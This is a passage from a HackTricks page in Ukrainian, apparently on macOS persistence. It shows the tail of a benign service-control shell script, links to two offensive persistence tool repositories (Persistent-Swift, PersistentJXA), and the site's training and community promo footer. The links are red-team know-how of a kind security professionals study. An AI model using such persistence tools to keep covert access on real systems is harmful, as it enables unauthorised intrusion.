if [ -n "${pid}" ]; then echo "${pid}" return 0 else return 1 fi } # # Generic action handler # RunService () { case $1 in start ) StartService ;; stop ) StopService ;; restart) RestartService ;; * ) echo "$0: unknown argument: $1";; esac } ``` ## Техніки та інструменти постійності * [https://github.com/cedowens/Persistent-Swift](https://github.com/cedowens/Persistent-Swift) * [https://github.com/D00MFist/PersistentJXA](https://github.com/D00MFist/PersistentJXA) {% hint style="success" %} Вивчайте та практикуйте AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ Вивчайте та практикуйте GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Підтримайте HackTricks * Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! * **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами в **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** * **Діліться хакерськими трюками, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на github.
{% endhint %}